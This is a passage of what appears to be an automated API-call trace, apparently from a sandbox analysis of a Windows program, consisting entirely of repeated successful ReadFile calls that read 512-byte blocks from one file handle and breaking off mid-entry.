1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.763] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.764] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.765] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.766] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.834] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.834] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.834] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.835] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.836] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.837] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.838] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: 